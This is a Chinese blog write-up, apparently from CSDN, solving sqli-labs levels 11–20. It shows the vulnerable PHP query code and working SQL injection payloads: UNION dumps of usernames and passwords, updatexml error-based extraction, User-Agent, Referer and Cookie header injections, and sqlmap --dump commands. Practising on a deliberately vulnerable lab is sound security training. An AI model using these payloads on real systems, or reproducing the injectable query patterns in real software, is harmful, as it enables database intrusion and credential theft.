sqli-labs靶场练习Less-11~20(持续更新)--ch4nge

最新推荐文章于 2024-01-28 23:30:22 发布
最新推荐文章于 2024-01-28 23:30:22 发布
阅读量622 收藏 6
点赞数 1
分类专栏: sqli-labs靶场闯关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25094483/article/details/109296256
版权

Less11-20

作者:ch4nge

测试闭合方法

目录

sqli-labs(11)-Less11·post·U

手注

这道题给出来了一个登录框
11.1

源码:

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

闭合:'

这里使用bp进行测试username=admin'
发现报错信息内容
11.2
注释一下试试username=admin'#

这时的sql查询语句

@$sql="SELECT username, password FROM users WHERE username='admin'#' and password='$passwd' LIMIT 0,1";

处理之后就是

SELECT username, password FROM users WHERE username='admin'
所以可以查到admin的用户名密码

11.3
后面就和前面union联合查询步骤一样了
Order by爆列数,3报错,2不报错,所以2
Union select 1,2查看显示位,(uname值为不存在的值)
11.4

在2位置查看数据库名

uname=1' union select 1,database()--+

11.5

后面和之前一样,最后查看users表中的字段值,这里在1位置显示uesrname,2位置显示password

uname=admim' union select group_concat(username),group_concat(password) from users--+

11.6

sqlmap
sqlmap -u "192.168.1.218/sqli-labs-master/Less-11/?id=1" --data "uname=1&passwd=1&submit=Submit" --technique U --dbms mysql -D security -T users -C id,username,password --dump

–data用来指定post内容"uname=1&passwd=1&submit=Submit"

11.7
也可以burp抓包保存到txt,然后sqlmap -r xxx.txt
sqlmap -r less11.txt --dbms mysql --current-db
11.8

sqli-labs(12)-Less12·post·U

源码:

	$uname='"'.$uname.'"';
	$passwd='"'.$passwd.'"'; 
	@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

闭合:")

解法同Less11

sqli-labs(13)-Less13·post·E

手注

源码:

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

闭合:')

显错型注入,暴一下数据库名

uname=1') and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

13.1
查用户名密码

uname=1') and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username='admin'),0x7e),1)--+

13.2

sqlmap
sqlmap -u "192.168.1.218/sqli-labs-master/Less-13/" --data "uname=1&passwd=1&submit=Submit" --technique E --dbms mysql --current-db

13.3

sqli-labs(14)-Less 14·post·E

代码

	$uname='"'.$uname.'"';
	$passwd='"'.$passwd.'"'; 
	@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

闭合:"

uname=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

14.1

后面同Less13

sqli-labs(15)-Less15·post·B

代码

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

闭合:'
布尔型注入

uname=1' or length(database())>=1--+

15.1

sqli-labs(16)-Less16·post·B

代码

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

闭合:")

同Less15

uname=1") or length(database())>=8--+

16.1

sqli-labs(17)-Less 17·post·E

基于错误的更新查询POST注入

题目环境修改密码的功能页面
17.1
经过测试uname不能注入,注入点在passwd
代码

	$uname=check_input($_POST['uname']); 
	$passwd=$_POST['passwd'];

	$row1 = $row['username'];  	
	//echo 'Your Login name:'. $row1;
	$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
	mysql_query($update);



function check_input($value)
{
	if(!empty($value))
	{
		// truncation (see comments)
		$value = substr($value,0,15);
	}

	// Stripslashes if magic quotes enabled
	if (get_magic_quotes_gpc())
	{
		$value = stripslashes($value);
	}

	// Quote if not a number
	if (!ctype_digit($value))
	{
		$value = "'" . mysql_real_escape_string($value) . "'";
	}
	
	else
	{
		$value = intval($value);
	}
	return $value;
}

ps:check_input函数暂时不知道怎么绕,只好搞没过虑的passwd参数了

后面操作就没什么说的了

sqli-labs(18)-Less 18·UA·E

UA注入

解法1

先使用账户登录
18.1
页面回显内容有ip和UA

试试UA注入(登录框没有注入点)

$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

在insert语句中有uagent,在这里不能使用注释符进行注释(注释掉语句不完整,语法错误),而是要和sql语句起到拼接的作用

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

尝试注入判断语句发现没有回显数据库信息User-Agent: 1' or '1'='1

18.2
尝试使用报错注入可以回显
使用报错型注入

User-Agent: 123'  and updatexml(1,concat(0x7e,(select database()),0x7e),1)  or'

18.3

解法2

绕过姿势:User-Agent: 1',1,1)#

User-Agent: 1',1,updatexml(1,concat(0x3a,database(),0x3a),1))

18.4

这么写的原因可以从源码来看

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

将值放进去

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('1',1,updatexml(1,concat(0x3a,database(),0x3a),1))#', '$IP', $uname)";

相当于这样

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('1',1,updatexml(1,concat(0x3a,database(),0x3a),1))

insert插入的值与字段名要一一对应。

sqlmap
python sqlmap.py -r 1.txt --dbs --threads 10 --technique E
python sqlmap.py -u "http://192.168.1.218/sqli-labs-master/Less-18/" --level 4 --dbs --threads 10 --technique E

第一个请求保存到txt文件里面-r跟上txt文件的路径,让sqlmap自动跑,注意user-agent后面要跟上”*“符号

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0*

-r: sqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)
--user-agent http头会携带一个值,就是user-agent,表示访问的浏览器的信息
lever>=3才会去检查user-agent头是否存在注入漏洞

sqli-labs(19)-Less19·referer·E

Referer注入

代码:

	$uagent = $_SERVER['HTTP_REFERER'];
	$uname = check_input($_POST['uname']);
	$passwd = check_input($_POST['passwd']);
	$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

登录框有过滤,referer没有过滤
闭合:‘ or () or ‘

Referer: http://192.168.1.218/sqli-labs-master/Less-19/' or updatexml(1,concat(0x7e,(select database()),0x7e),1) or '

19.1
或者

Referer: http://192.168.1.218/sqli-labs-master/Less-19/' or updatexml(1,concat(0x7e,(select database()),0x7e),1))#

sqli-labs(20)-Less 20·cookie·E

闭合:'

登录账号显示
20.1
Cookie值为用户名,存在注入点
刷新一下抓包
Cookie位置注入

Cookie: uname=dhakkan' or updatexml(1,concat(0x7e,(select database()),0x7e),1)#

20.2

代码分析:

	$uname = check_input($_POST['uname']);
	$passwd = check_input($_POST['passwd']);

登录框有过滤

再往下看发现cookee没有过滤,搞他!
20.3

sqlmap

在cookie后面加*号,保存到文件
20.4
右键选择copy to file
20.5

sqlmap -r less20.txt --level 3 --dbms mysql -technique E --current-db

20.6

changeba
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sqli-labs靶场Less-11
songling515010475的专栏
08-25 130
1、访问首页,/Less-10/index.php,这里的传参点是表单中的uname、passwd 探测六步 判断是否是数字形传参 判断是否有单引号闭合 admin' -- qwe 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注 分析:这里是通过单引号闭合,注释掉后面的SQL直接绕过登录 2、通过在uname后面拼接参数 order by 1~3 ,如下图3的时候提示没有3个字段,只有2个。 3、通过uni...
upload-labs靶场 11-19关 详细教学 上传漏洞
小明师傅博客
06-09 1183
11关 这关采用的防御手法是白名单过滤,只允许上传jpg、png和gif类型,并且将上传的文件给重命名为了白名单中的后缀 这里我们用00截断,要求是php版本低于或等于5.3.4 这一关上传目录是可控的,所以可以先上传一个后缀名为.jpg,然后修改上传目录为.php后缀,之后在.php后使用截断后面的拼接内容 注意这里的00字符因为在url的GET参数中,所以需用进行url编码 第12关 和Less-11不同的是这次的save_path是通过post传进来的,我们还利用00截断,但这题需要在十六进
sqli-labs-master【Less-11/12/13/14/15/16】
weixin_44352521的博客
12-18 384
Less-11 进入Less-11之后,可以看到是全新的关卡,是一个表单的形式,需要我们填入用户名和密码才可以提交,首先我们随便填入一个用户名和密码看页面会回显给我们什么内容? 我在这块用户名和密码都输入的是123,可以看到登陆尝试失败,不过这都不是重点,我们观察一下地址栏这块,我们提交的数据并没有体现在url中,说明11关是POST注入,那么什么是POST注入呢?就是数据从客户端提交到服务器...
sqli-labs less11-16
sopora的博客
10-09 250
LESS 11 基于字符串的注入(POST) 在username栏输入单引号’测试,结果: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’’ and passwo...
sqli-labs-master第十一、十二关
m_ing
05-12 1370
前言:我们前十关研究的是get方式注入,我们这里要明确一个概念,GET和POST的数据交流方式:GET是从服务器上获取数据,POST是向服务器传送数据。从第十一关开始就是POST方式交互数据,也就是向服务器传送数据 先查看第十一关页面: http://192.168.89.134/sqli-labs-master/Less-11/ 访问我们的十一关,是一个登陆页面,通常post传送不能在url上看到数据,只能通过抓包工具进行查看等等 我们先尝试一下输入一个’看看怎么反应 我们那错误分析一波 这样一来就非
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场
02-12
sqli-labs靶场
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-labs Less-11~17
qq_38891528的博客
05-11 118
Less-11: 首先正常登录发现会回显登录名和密码 再利用burp抓包,重新发送表单数据.得到post data 将post data 复制到hackbar进行后续操作更为方便. 判断是否存在注入 加一个’,发现页面有错误回显,可以确定存在注入漏洞. 判断字段数 字段数为2. 判断回显位置 已经知道有两个字段,且其会回显1,2 查库 查表 查列 查字段 Less-12: 同样的还是先利用burp抓包得到post data 判断是否存在注入 加.
Sqli-labs靶场详细攻略Less 11-16
qq_41755084的博客
10-11 611
这一关页面发生了变化,开始使用post方法传递参数。在Username字段输入1',查看错误信息。错误信息中发现password字段,基本可以确认这两个字段在同一个sql语句中联合查询。使用order by注入测试返回的参数为几列。测试到3时报错,证明返回两列。注意,这里的注释使用的是--(两个减号一个空格),而不是之前的--+。之前也提到使用加号是因为在某些http实现时会将加号转变为空格。这里使用#进行注释也是一样的。使用union select注入查询数据库名,数据库中表名。
sqli-labs靶场Less-12
songling515010475的专栏
08-25 265
1、访问首页,/Less-12/index.php,这里的传参点是表单中的uname、passwd 探测六步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注 2、通过在uname后面拼接参数 order by 1~3 ,如下图3的时候提示没有3个字段,只有2个。 admin") order by 3-- qwe 3、查看SQL结果显示点 ") union select 1,2-- ..
sqli-labs:less-11/12 简单SQL注入和身份验证漏洞综合
Zeker62的博客
08-31 225
这两个靶场是一样的题,我就拿less-12说事了吧 首先,尝试胡乱输入密码进行测试: 发现存在报错,这时用admin和admin这个正确的账号密码进行测试(1~10前面的题目告诉了) 发现有着正确的提示: 但是还不够,我们尝试在username后面加上单引号: 发现正常报错 加上双引号尝试(没输入密码) 存在报错,这个就是SQL注入点:You have an error in your SQL ...
密码字典,超级火狐资源及SqliLabs Less11-12
qq_45785324的博客
07-10 537
老版超级火狐下载资源;fuzz密码字典下载资源;SqliLabs Less11 Less12
sqli-labs (less-12)
kukudeshuo的博客
03-09 1194
sqli-labs (less-12) 进入12关,我们发现页面和11关一样,我们先输入用户名和密码进去,我们发现用户名和密码也是使用POST的方式传了上去,那我们像11关一样使用hackbar抓取POST请求 判断注入类型 uname=admin'&passwd=admin&submit=Submit #页面不报错 uname=admin"&passwd=admin&submit=Submit #页面有错误显示 根据输入"时的报错信息我们确定闭合方式为"),也确定为
sqli.labs靶场(第18~22关)
最新发布
喜欢创作各种技术类文章,希望可以帮到你
01-28 1866
sqli.labs靶场第18到22关详情
sqli-labs-master通关之LESS11-LESS16
weixin_43726831的博客
10-10 567
SQL注入之sqli-labs-master LESS11-LESS16 less11-16关中,是最基本的POST交互方式下的注入 包括联合查询法,报错型注入,以及布尔型盲注,在此博文中,对其详细过程没有做记录,但是万变不离其宗,这是建立在GET交互方式之上的,所以其方法同GET交互方式下的查询方法类似 联合查询法 报错型注入 布尔型盲注 时间性盲注 LESS-1111关 1.通过WEB页面...
sqli-labs靶场实现(三)【POST基于错误的注入(单引号、双引号)】(less-11~12、具体步骤+图文详解)
weixin_46709219的博客
12-15 717
一) 二) 三)
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
"sqli-labs-master靶场安装下载" 本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值